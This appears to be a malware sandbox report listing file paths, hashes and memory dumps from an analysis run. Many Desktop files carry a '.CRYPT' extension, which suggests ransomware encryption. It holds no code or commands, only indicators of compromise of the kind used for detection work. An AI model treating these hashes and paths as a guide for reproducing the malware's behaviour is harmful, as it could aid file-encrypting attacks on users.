SHA256 5812ebbc6311c0ff9919a27137b22435cbca3cb9fd56959b44ddb82f93609b99
SHA512 762580962300f0e0501054450772ed59cdfec76d7aa6b1944f557ccd74ec2fcd171ffd67765f2b367c526d0193eabd184f0d4ac1dadb7a0d25f00f9866f670bc

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js

MD5 26645133c9de7799e35cee0e47b82ee0
SHA1 bb6be735f6814d765bbe6b3f3ce034d1767366c5
SHA256 1180e5728ff28a49eec43c61f15d49541419e79397ae58479db67b533d292d36
SHA512 c466dc886b25fea5a0e16aec28a4e784afe797f3937c7863788d0e5fa41414346bb17546d49178a48815debcca50aec3acabadc1f508fe0a3207008bc722608e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png

MD5 cc62ce00dfbe76fd8affad9c89fced8c
SHA1 75d64cc57ff45a50c066f882bfd8e3845f8fa323
SHA256 e324ff224bfa2baf51d4ab75f686195a76b8c984676c450ed660eb9ca2b36f4e
SHA512 028056e42f0eb02646752b351bb04a6b9f87ff27a2e1060b4fe4d4867118fe90f42f555ea8c645361963405583005ec4f3802c7c57729fc8616df1af09cc94dd

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\ui-strings.js

MD5 fa904cdf440c6743078637992d58489f
SHA1 6969f407be2a1b52c5a41be256433026cabf9917
SHA256 152f6d0325802be61521bff49a8dd07063feaffeb2447d3ae6f47adf214cbffb
SHA512 c6237e56225d36d26ed594406a5bc08987bc34fac8d425dac8f909512ff19e6a27e1566651c591a38c0a5476e74dca09beb53ec15d4f08b6de2843fa064cbd3f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ui-strings.js

MD5 573dd292166f86741bb965ee068c3793
SHA1 169fcf0880c7a2c5993f5bf28ff64cd9ed441dd9
SHA256 ab2b7de642b66db6e6b610dab8fb3c94c972465e07b7f681127c40a6629d8c2e
SHA512 0217d582d827a7b6faa950bc726d41c4c7644ba11b19689b9e5eb60cf54df4afaefcf4eac3649e8315dc1134988dc71abcb94bd9a640829bf9d68a6ffa17241b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js

MD5 7adbce4bec815b574ab3fc6d85eb1937
SHA1 7d14e52fc6aa5796996988e9feab97c31eab1e0b
SHA256 efec14a7f219aff9e96c136933c0316abbabfa082b5755a86b2745c0a8423a79
SHA512 4218fc7991ef7ab93b1fab696432fc0130f07c534b2da244ce3370e6092213db657505af8380e7a07576b16b19d7c1b58f6a5498122d73061a362162b31f5b18

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js

MD5 bf70043c03230a91bb5b402e7ee67e63
SHA1 2ec8302c3ebe1e34abb5e0c813abceaadfc5073c
SHA256 a8b45a4c0a3adae007e8ef6b3a0e9966d2ad0c552320210a778109e2799f6c75
SHA512 ecdf54cc56de9c49dec1e9e65aefa736201904e609474b13d089f188bf35ae46b62d1ba492f4c25ad3fd7ff584a1532be18c0115598c2deaa834b22e6e52a601

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\ui-strings.js

MD5 478f0065e127108d705114b29fb9170a
SHA1 3d954983b0594275bdbe444336baad9517129b79
SHA256 1beae6b25a652882189f27e3b52232bc3451a54eeedf3e5cb0eb827fe15032f9
SHA512 4affd4e7c23c555d99a5a1a4ff929228af723961c6cc1c320358998fbba2528e2d84d5c64a5c28fd6420ba3132fad056f2388538086d061510d80e244f7b3990

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js

MD5 661fea8b99a08e2422d8b5b9bcfd9921
SHA1 54a78f38a3599aed6d27c6fc711d7af7a205c524
SHA256 60624904ad10defbfcafa3acd5dac4c7c5040edde23bff489b6b32ea5a1403ad
SHA512 69b58c6c99f494ca1b6f2788cd17b63cc9f583b0abca870f666aedb9c504f660b03df699b69828c8ecc43a747297042eeca7e197de96dd43defb7871e2289b9c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js

MD5 3dd77972f6558af4969a57eb4f19f2d0
SHA1 d56f6ebeaf408c667bb9491845a33ddc19d18947
SHA256 cde2dda4b1709d6591356e21717833ecf9802dc119d719e9dbbc97b090158644
SHA512 68f15867e6b29cce5415ce31203cc3f1790869f85d1b1ba8b2912e9b1b570f61485e5e9aac96d9bcc069e81d298b56d8941cd94a1df72d07c7508c7fdcc7ef1b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\ui-strings.js

MD5 95e6ecbe44dc4ab34323c697c6568b56
SHA1 0ca5debc2a7b53245ae6b7d6594ba93b3152bdee
SHA256 d3bdbdce059d04ec6e336179e6262bc694def0fcc5fe4b006953dbf178dbb30c
SHA512 af6262bf0a2b16fbd1dff7051eb0373336781c105b63631080ed2b6d38f54adbdbd16d794917fb9ad08c9ee238e0d4df732b7ef3e4c6d521a6b347eb8c2e9804

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\ui-strings.js

MD5 4fcc8af63d8fea1581c1e96e9436e913
SHA1 5c09be5c84dba1172a2503a3406223baed06f8bc
SHA256 bbce03b612d22d42e40207a0ac4b6492ab0ad8c2cf4690377929f4cad738954d
SHA512 4bb1df7206f7fee79df361d678cd250399efff9d13d3435448170efd515abb425fcbf3b6ad9d0c6da1b4a7860d33dfd15daaa199e96dcdd701afb3b80234f2d6

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\ui-strings.js

MD5 21a5d65fbcf76ed1b8e9489d3bb051f7
SHA1 dcfde89bb81642e0b1bcb2b4d8c0fe574e912950
SHA256 f054ff5e3f41e79c647bd03dc9ad1bad42f8292c7e7b839088faeb8abc182ff4
SHA512 566bc1f2c5f4b2b9888c8e414552c25609d2562e10a8abddf6f036a6cbe2bc7644cbe850311224c25db96380c0e11fb07800f965305f41e068968bee530c320a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js

MD5 0e038344281f0aa0a74103dd77048888
SHA1 163a5a2d3888eb23ecc17b53865742f3eb7aa3c1
SHA256 f3a76de64a79cd7afa5438bb0a4f4330a97497246fe00f7b29fb690e2ffe32cd
SHA512 5988b04142669c005728510cc0a0c7507a9b8561b9d3178e3ef06b77a725e5e3ab7c13faf2998522c601285e823d3f72edbe7b93ba6b14a9c5afefbacb974560

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\ui-strings.js

MD5 c4b091c93a4910ecfc619efdf3c56111
SHA1 4147f571dfd1d77b6a6943c57784820bd0cba24c
SHA256 d30e4139d68728b1c0b7c0fdccf649fc98c269f0d57c08e1d2033c13f162c29a
SHA512 b276ec16ba3a0737c8958a7373c3b5b53d384432535e65ee5651dce90da0eaf7dad1a02479243efb0b5ea78234c0f423ebc10c82b6e28db557106b8a21db1964

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small.png

MD5 65afdbfd57a964a5525ef68ca68cb5f4
SHA1 986fd9886e54eaa35b90561c94b00f85eb758711
SHA256 322fa7539ee1552758dbb051fe1199a7b4b247ec8335fb35cabf043d8947466d
SHA512 88b2d9c205d6fa4fb7823fa118fb95c651977cbaf1b54445ced380d34541e5367a218de4335a341b3994839386b487fcc33718b749ab2e05678ae87e0da1dbd7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons.png

MD5 2870d12e27e8a50bf66493145c06939a
SHA1 f4319fc28ae1f99e359b5cfbd4c8c69af67dc03e
SHA256 dd6fda1bd17d115065254a8af134a7906d8e15e2725b01223582c3add3240272
SHA512 39b2281464998cd9f3d87659cdf7f3f2690a82bb8093ac64d5141d837dd4f951514cf0fcbfc02a0102f3d8ce780805886a361c649d6df2347db60b383442e5d0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adc_logo.png

MD5 d1dfee6d7b14e63f64c349b2cae8ad27
SHA1 fd382215ff99c0993d8924f18ff7912b4835f4ad
SHA256 b63bba00ed3b7a86b6ed36ab7d6eede57656454e0a583b875d34ee19466714e4
SHA512 220e189bc67b20bef3f92da6dd063b12fd53436c6fa9e728553669e4d42dbe595c52801e68a929797c48dc56fa4ff47919aa3d065363ce881e207abc83f7de77

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png

MD5 598b166da1d843121d50f9593073a15e
SHA1 e41c87d8fa9aa263dfe783bdd692556fb8e24f43
SHA256 c46d21ff4c32097f172b4e99b5794374ed4a1cb025040d157f611f43929e98d5
SHA512 107ceb56129c1baade5930cea77fdc9c53264ff06b92936a5823c483235ffce8ab4ca3efef5001c5cc16eb3351b663877e1e4184749ba33d785b4927fe2f2db1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png

MD5 48a2c150eaa7d9fe84e7e31163e67495
SHA1 cfd5375b61328af47b784d2e1229c95c9355ce06
SHA256 ff1d90818c6ec24ad8dc4334bed7e72b3ceb9460cdfe3b25ec24d2b31b4c9288
SHA512 e6abeeb5ed043270c9148b58fa359d8536e0a9606aaed86446f3cc3ef14a855b711a86869d02fe27f50ef79b91895c77bc970c6ccf962caeb8311984c4778410

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png

MD5 34300ee4cd847a5329747c2294699c1f
SHA1 5e1086c8ebeaf9205517c82d8ae1711931ec48e1
SHA256 122650bd6eea6dc3c3cde5c472c78fe200967b33c6e3f3d2f394d8fb66c3acfe
SHA512 ecea239cb49cc1b9018e9d5bc34fa0d501cd9dc6bd7a8c01b8a2bfe9cb8d9baf805081d3705f0f986903a93a35a3ddcb852463bc2698606b556999cd0608ad6e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png

MD5 d82b1439dcd0ea62ce3edcf6d36eac1e
SHA1 f5216b9a0c6b294584b24a5fd50b43e79d46310e
SHA256 44f25bfcbff16b8e7c81ac93d6dcbc312035c81ba6d62e61d4177e23ef62dbff
SHA512 bc789786f1261ce50116190f56ce7da3063fb944af6e5da17fd0a61e51d3d25b11fc09a83d2fd1805e16f33c2c469bd28d05366b8fff7faa85d3dd498e5e3d1a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png

MD5 7d1b0ec51595563c9214ddfdec36f303
SHA1 bbb988973a8281943b5bfacb8ab03d97c0f0f398
SHA256 c915635ac032617e1acf87810abd8e8d9825c7e40a74245bc9efcf31d6da9da9
SHA512 709deed649d6062cf8c1ada7207b9c871d51a69a4bc7dc3c1408bd6a38d211ff53ce19a091cc4bb68a62eb00aa512afd07a33d314393812716391f04faea93d3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js

MD5 ac24e253ff384d8523af43f5a93688f7
SHA1 beb4ffa972185300803e9a1f6a16ec062cec1015
SHA256 f49327d72a4888fee8721962d13a94571e349ba666a0e1354c4f49331e858cff
SHA512 9c559a1bdaae9172fbe9e6a9b907390041fd16d0382a202423e0d9d19bb0f2c06a7228d6bc17df943d4e927c0420f302982e0463755bfd5c0d6e4ecb65504a61

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js

MD5 cb05ff26ffcb30838de16f659f8d93c9
SHA1 f9e977e1f60be49be8a17cf75d31f4a7620827ab
SHA256 ef97178fce43f78773e1c57cebaadd55904a1e5d810f8f75219b23e92c00687d
SHA512 26fc3838e5ef5b638d974be02b6d8f76f7f4778b1b612ea9031c5a5b1cf4a421e48c7a667a1f8db55270c1c86c4e1ec469c8078dd0edaeec2df02fddff27a999

C:\ProgramData\Microsoft\Windows\Caches\{F337657F-5568-4EC8-923D-F92E0EB7EE39}.2.ver0x0000000000000001.db

MD5 8b836d8d3ea988668ddae3311f514a57
SHA1 af3199496b831b74bde630f871615ce5848f9857
SHA256 ac944397bb7351bf439ea8b7e6cf5863fed078383f3da0b7c92b53408fe680d5
SHA512 f205183db25237a58c6a33b9c83af86df3210fc7cc411d4638af9c856fb39a2795c99d612601bdf183101402ed6455b7949a9deabfb2b2262afe47dff0c17cc2

C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\0f8e2cd5-b8eb-7a22-b9e9-9b1183fa0a84.xml

MD5 29eb0301f92bda0d67f79582acadf847
SHA1 2c2ac90238793f699322833c2f8bd043cc29ddec
SHA256 221ce3a8c269f4dff433a9a8a9807f65d8fa7b302e640b245f7293a0998363d6
SHA512 61f47426e5dff09a432a7848f3d07cfb5f85cab6b327fb416c31223e6a5ecaaf3a3f065a6c4bf0a352fb4fd3c7199ae481c929c43da3d596000f87d7f6bd52c1

C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\bb26a0e5-d235-0ee6-0c36-6d5e185fa5b1.xml

MD5 31434364acba2fa351fc9715db743df4
SHA1 1c2e77b236cfdd14960e90c9a48e59532d1a255b
SHA256 a94fc52f4840aa6390d47765d3fce16ab6d1c1978441156ef607a4b6f63fc317
SHA512 b069a65226c5aea8d50da2a179a351051a6680cf42a117d5d5b98e97bdcdd12e412f698b89039bd3464550e5794d3b95d97c6ee6931dc72e1bb060daa08e40b4

C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini

MD5 ace3165e852adb8aedbeda2aa3be570b
SHA1 4577ff7e92850e2723008f6c269129bd06d017ea
SHA256 237f73d46d3501de63eae1f85fdf37e65ddced70f013b7f178d1ee52b08f051f
SHA512 cf77563b9295b191ce2f309e03618d1ab4d317f65b87dbecc4904ee2d058db06d23c20c199571b0fafb67ae5ec5166b76af0b7d8bfe3996b0dde9751e28f8c03

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db

MD5 c7c6abfa9cb508f7fc178d4045313a94
SHA1 4f130f23896bd6d0e95f2a42b2cb83d17ac8f1a2
SHA256 1bda9f0aed80857d43c9329457f28b1ca29f736a0c539901e1ba16a909eb07b4
SHA512 9f1c1e438b8cceda02663a61a64c1c5fc6fb6238aa92d30e6d8d1a7b0cb29a8a6f26b63b9964ad876617f71ee7dc3c05205158c4ed4be327149652b1c6900825

C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.3.db

MD5 4534f12102d235344cf8dda748f0cabf
SHA1 7db67baceeecb3a420bf37a7beca4a45185f8f3c
SHA256 1bd4db450abc8914c2fac721cace2704ff4c16028e6d07293154dad289835694
SHA512 7b4dacdbc6a2fccdd3818eb41b7fa23eeec51f333af0e842d9185c7ae45eba1623369b1caa27b824cba10c4cd6a2cdbf7f127ab2c6f7656eedce5fe25a0b84a2

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{e2b8b059-2290-4735-a51e-04a2d858724a}\0.1.filtertrie.intermediate.txt

MD5 f6a6263167c92de8644ac998b3c4e4d1
SHA1 c1fe3a7b487f66a6ac8c7e4794bc55c31b0ef403
SHA256 11770b3ea657fe68cba19675143e4715c8de9d763d3c21a85af6b7513d43997d
SHA512 232d43e52834558e9457b0901ee65c86196bf8777c8ff4fc61fdd5e69fd1d24f964fed1bf481b6ef52a69d17372554fecb098fb07f839e64916bdd0d2abf018a

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db

MD5 794e3946d02095ca5a7174cc1c5c3ad7
SHA1 d0d869fc4814041604f05c1819dbaede5897c3d8
SHA256 dcfcb4fb798556493cb1ee43012f501b2d1fd16b63aa163fe8117c359b9ff131
SHA512 1d2f06e2e640eb5fccc7762196a06a92aecdb880f9cc9d2c0a6f72cc654b549c896cba8d09a23f8571073c89c17ddde27db60d9223ba9bda11776c1d89a8e08a

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 061ce6fe66cc378b312f2173e6146e32
SHA1 00e8fcc73c8309ee97342750cd5a73287744299a
SHA256 a2e5ca1818a970102b678fcbf4e098f845d269baa785d9a9d200de0cca56e92b
SHA512 c9133fc6ee8f9ae517da08306a7abd3cb855f594a3e7ef89815e0635380d28a8c9c97fc592a8d1b80798d84c4bc48f531f09fd0ebe3b471a6e3880ac482fd4a9

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db

MD5 c54cde3ceede65db57e1ef09429038d6
SHA1 d40df43ca2538ba8f23eb8d5e6ba48c6cd1a29a7
SHA256 80a0bcaaf774d79edb86f7cf3793bb8d584f3b74a67112b7b7b651aa762240eb
SHA512 1677ee5d05e7357550bf0b45d5f077557e3835d066ac930692112c69c4719a4f618af33f8531b9b99f202d3e69716e2f53faa7da0c8092ffa22a43b585777f2b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 0150b46ed17d8afad43443d983cd3ea7
SHA1 b508398f95127bdf4dc10a647751d6d1b6c4e985
SHA256 e6e6f2088fac30d468f6358f2974993f54914c770ced0a7dff8f0083654ab590
SHA512 d0fdc4482f7c077d96d49afedce04f74a34dd7841d8ce40d306dceae896a642cc56b65ee1843635cb5d9ca7efae0a2185c820899555133d59d91d991872ef3fe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db

MD5 ae6fbded57f9f7d048b95468ddee47ca
SHA1 c4473ea845be2fb5d28a61efd72f19d74d5fc82e
SHA256 d3c9d1ff7b54b653c6a1125cac49f52070338a2dd271817bba8853e99c0f33a9
SHA512 f119d5ad9162f0f5d376e03a9ea15e30658780e18dd86e81812dda8ddf59addd1daa0706b2f5486df8f17429c2c60aa05d4f041a2082fd2ec6ea8cc9469fade3

C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{03BA58C4-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.CRYPT

MD5 18702d4f8877ad2e936a4284dd428e59
SHA1 8a919f584eda5611e49fe1d1102713246f3da236
SHA256 1d1b62f7111bf53a9eda4bcf68c98e7e026fbb7c03fa2577d11ef8437d4189ef
SHA512 9fff0d6620a28749f02c90ed1fbd5ec5515d1575e12410f65b40beebbd4312daf3e12c00c13f8e3774e62432943bfc0a6f939d8892b54c2049c3272df83aa6cf

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5 2ee8f59b7211eeda18023f0202f0e55d
SHA1 840921d8e124bf233db3969d04ef3911d5a87503
SHA256 8dd07eefa59b6e85934c9fc5af24ef3cc414dad04b3b03792d348a32d5c23a75
SHA512 ea44c1f912625c0b522ec54c3e64233b08123088e9caf77a6e563e02403545b2ad13fe96ad5739bce1b54cb57930eb913fbcdb4f2b17889ee45fbe769ad5bd9a

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 c40e417829c7873578be9dc87c904cf7
SHA1 295f131b8db3401025523f48ae8af4e121f20123
SHA256 bbb76aec5e68f131eba7b7ae21e81e182c39d5dfcc4ad615c799b2a2372c8461
SHA512 b0182d595d49dbdac4bba6d599de1ebcdc4f93ef7f797dc7ec8295295ff6f9ccebfce160181ad2ae5ae4f1e36e65a8af49c79a8280b50e22ae84567656723d82

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db

MD5 72ef40c1915afb3e7ef638c512a7579f
SHA1 616180f75ee011973c4254e4a280dc942a0cd678
SHA256 1d86639508717d445c88d742e12143e51679bded592bf878a0164ef04aba67b1
SHA512 09b8a61cd5a63ba9050ff61b7dfdcdc92da29dad692e11c1c70d6e181cd65e38a6b815766fce5d2d35f165b4c1fbe0d8f573173e0a724d887f7b58ac2cb4ecad

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 392e428700fd6c73548d596d25f86d17
SHA1 95821fc7c16f3702440baae6b441a73fc23e2b6d
SHA256 5732cbc8637d933a31ac6ea8437d799423d269a711f214985e005f4f4d21ebbf
SHA512 c4c9d9ea800025686390cee626854b7f5b62c0c7e82678b8c655bd35ffe46bca0cc5ce628a8955b89983af51664be2e508df3c2e41b4b59e72c22a3fe05956a4

C:\USERS\ADMIN\DESKTOP\REDOSEND.XLSX.CRYPT

MD5 3e7c6a1a31198245395cb0390a804843
SHA1 e1a65025b78b01ee54640330ecd573db2b91510e
SHA256 9974fa3b2e1a4f2ba8f3aea1cc3e5cca87abbe8c8339cf3cdcc7dd4c279d3b05
SHA512 7d1ba6357f79e2faefea29e300a2d8e0d4b647a358005b6fb6374280303a124469c6eea76531d6c01c7e66a9730d2a4b48d127b5fa4297917c77aa3d042a98a8

C:\USERS\ADMIN\DESKTOP\UNINSTALLEXPORT.TIF.CRYPT

MD5 ece3714113de91af4fa2429db4334726
SHA1 66c121ef204ae50c287170c27776960305fca41d
SHA256 1733aa5c08f00c79714a5ac22758407427379ff00eab275024b3531ef159a9d5
SHA512 778c0abcb54c56d29fa99b70d3d88ca985ad5059a9d6d041edeb5dd0e4e94975e84751db84172db3436028c87c32d7b6932df6322d31270a7b2e6bab11bbbd8f

C:\USERS\ADMIN\DESKTOP\SUBMITINITIALIZE.XLSX.CRYPT

MD5 346fb3ba575d343334f26e752c6191ad
SHA1 18de794fb71adf24cfe41fb937f2e3ab41bc7f4a
SHA256 12afae26f1d0ba5a3aad408a2df474f2c0e9336a959c51d328c9584809e8faea
SHA512 47d76b561a3dd4812f79d61388383f812877777da65ab506bef0a186c1d181671cc49244470175d6a46e6b2499181d7628baff757c335e2f4242eb8257527254

C:\USERS\ADMIN\DESKTOP\SHOWCOMPRESS.DWG.CRYPT

MD5 162248efc633a4124c22b2d6e70b1903
SHA1 93bb80672291b80ae06ee8402c52fc856f29b63a
SHA256 52cd49adabd9ec0f18da26f32a351172c90761e9167037f65e15eeafcb928ce4
SHA512 bc99c314b2fbad70ab01e668635814fed0834736c8479296aefd3b9895f5d9d114dcefb027df5b0287bd7e8538bbbe1530305cec124005d019ece3ef13d7c78b

C:\USERS\ADMIN\DESKTOP\RESUMEPING.DOCX.CRYPT

MD5 4d09842e882b144c3f81298b879d2dcb
SHA1 26b6a379e781f728c38e348124528a0c705d6760
SHA256 c6ef200ee87e574ac4fc204fdeb43ae36eb296eafd3f3abeab33de923bf45e1c
SHA512 855281712a9d7b6c5332825ef370d21e91877e0b6387a55a1266342003bd11410b4fdff99b0a3a90e4b6b25362b557695e3ed1a804e5f6c596636889ffce6ead

C:\USERS\ADMIN\DESKTOP\REQUESTGRANT.DOCX.CRYPT

MD5 aedcf971db9f42c48a7c60ba2d5cfd7c
SHA1 a7c237fb1795158698c8e3cce04c8e5526b3e8f1
SHA256 3ec5167148f8456ebbbccf1a06af91c7fb91f0eaa067b6dd51309076252662f0
SHA512 f98eb4863c87a771b22477ccba5f242cfd304cd8bef25bb7bac11bb7b6a0c5df1c7bbeaf16e559c1366ddb5de3b817a8a05b8702c1db9c01c954853614f05765

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db

MD5 d6463e79fee89ce8f669ff371a8be181
SHA1 2aafe905430acb59d09ad4dfa646e6fdec868f12
SHA256 429d4da80e7baf36c0d1df95ed5ed12fe870a2d5e6cf3f07014b0a762fc10849
SHA512 4e7947e8319842c8393355bf177a874054a7088eac46730f6b3f65c87d2b2bf3bf57ee92d9ba5507618a8dad07d8f8aec0dd6acb468ef29905ac42656afe964e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db

MD5 3697525427d6bb4902c016c932367680
SHA1 98cfe25bdf580aa2b46e5297b0f25618321a05fa
SHA256 b5dd5d4989f6253e95084f289d916feef445d6519c4e2bb604c359e29c5ea8bf
SHA512 3977c0bc2fb49726bec9aa921a14e0283f89a08b73c7f9672dfed1f428e94c8acd1dcbbd43e81ba749976617fd6d103a99dbc50d75df5ece880e6e863d1a98ba

C:\USERS\ADMIN\DESKTOP\POPSHOW.DOCX.CRYPT

MD5 e0ebdf33726aae1d7841381b0ff979c3
SHA1 c488831d48f496656080adfed8dfbc55da5093c5
SHA256 fa7dc27832a92316c47d84a7d3ad886369eefcdbddf537b2ce934ce937948fdf
SHA512 73f4325e64bf9c8210f88b3c62069ce6ec947c356f3f654141a3ef685e53bc086936c8b59a661bf5529b3507434078e8b729da1905095c44fb64b5eb33e177fa

C:\USERS\ADMIN\DESKTOP\POPREPAIR.PPS.CRYPT

MD5 d976b33d9b0be4e0103a1ca48bc3d13c
SHA1 9baa91e6a554662931404c18a36f80cf2fda1224
SHA256 f27ea6c1b72a7a62a013061c857337afa5ad324c7427cea072846892d43db214
SHA512 655b992dab3ac8209c84da47b87e4148873e9058387381af6733e68ddb1c2dea6bb663edb2eb136143ed1baf5924312ed89e207c1c00c52b528cb441fe043a93

C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.bin

MD5 2350b47261040b1ee32f7df427ab30fc
SHA1 e656cced405e01b6a60b7444b2c9e1b31ed7c63a
SHA256 612881f476b4820221970c20f44ee5d9cd9c64a2cd3c9ec82e6757209c0184db
SHA512 a9e5838e63c2f786d57fd3e808ed54c6af0f7fc60dcc9cc1d606309d976c1b8954ef6271838db3e20325a6d66889362e3f28825a6fdba5075b860efc43d1d941

C:\USERS\ADMIN\DESKTOP\LOCKOUT.XLSX.CRYPT

MD5 bfbe8b30aafe9584fc3ce7e6ea7a52bd
SHA1 8453702da1b38b06f8968b2fef3e41df9f1cd7a4
SHA256 01c9c67dc5d4dbe573f993622632166e0b41d72e579458c152e7fb66908d0a7d
SHA512 585a0b1b51ff08a29738b8cdf93b7705696382d8a457e6107516f223195c697a64a29fc1bad19a5a0f48b72b580af45ca6409421c3ff08f7a32e2f9b98a76798

C:\USERS\ADMIN\DESKTOP\GRANTEDIT.DLL.CRYPT

MD5 b69fa40fe3a18c578c5c9314756b6a10
SHA1 a3fa8dcada3ffe3deff4611d11367e46d74ec33f
SHA256 5f682761588f3f1d95a64f1886f109eba2092f65207ec52365e60a06c79b7622
SHA512 7dbd9ad40d3137f845ed1747fc4231bdab82b44854456616e273ce02b619e969f43682fc2f4c2d3ed07b292c72afc583bd654f941bef35c11c2cca0f3832dc54

C:\USERS\ADMIN\DESKTOP\DESKTOP.INI.CRYPT

MD5 718404539d55dc799af289df2922402f
SHA1 aaaac41aede0e09cc9e32eb492d71320a0d68822
SHA256 9b784d878936df4b1b912a245dea6ebf90848777b26e27cd9aaded29a8f2442d
SHA512 0bf614566590995bccde3d0553742e04f5c7c3560b1006823589163d0274fceca7c5b66090906fb74add518db2b7eab2745dc7e0e15f47ebb03d9f562c1f5489

C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI.CRYPT

MD5 23ca926074f3177efefc057fdce61909
SHA1 c6900ac94ccf77b5860c3cbc7961f1bee2462574
SHA256 0f571fc5ba58a8bd8f8d5983e60d71ea54a748d789860780c59bcc03a12d3bbe
SHA512 c07eae9d2257c6a39b723af11b5f4f988dc3a1f5e120df49dde74767249374f1948728c65d0500e75cbdfeb2aef7d2f2debaf88546db2dad1c56299dd1595251

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db

MD5 c6bdb2c17c82f117224e609cae65e5dd
SHA1 3f1e92be35ca40127233dc55776a9ea151efc00e
SHA256 cd7f1225a8e24bac0da13c1ff6559f8492cd6cbce920ca87b12c2e017d1c177e
SHA512 46c28e86c3956ec81d96bcad06a5ab90087a9bcd971efa91188584e75f9fe21cb41458ac0ff215911543d1417b131e3a8847d9cb5d0998c8f48c90cc90938586

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin

MD5 0f7dff66a128cced04327977bc7b5e7a
SHA1 d7b4ec941cfc3dec39525b047ca8f02e12061192
SHA256 da07d7603eadcd9d567889527fd3548990260ce623b891acb527486f234807d1
SHA512 45a88d12fedd37014eca03ddf5628fa7c4509270098f2c08412825ac50aeeab37bde8608b8a76a7f8504e6d6b3ad87b676ae69bdffa491620e7d2f2210ff50ae

memory/4804-22287-0x00000000046A0000-0x00000000046A1000-memory.dmp

memory/3688-22294-0x000001563AD00000-0x000001563AE00000-memory.dmp

memory/3688-22293-0x000001563AD00000-0x000001563AE00000-memory.dmp

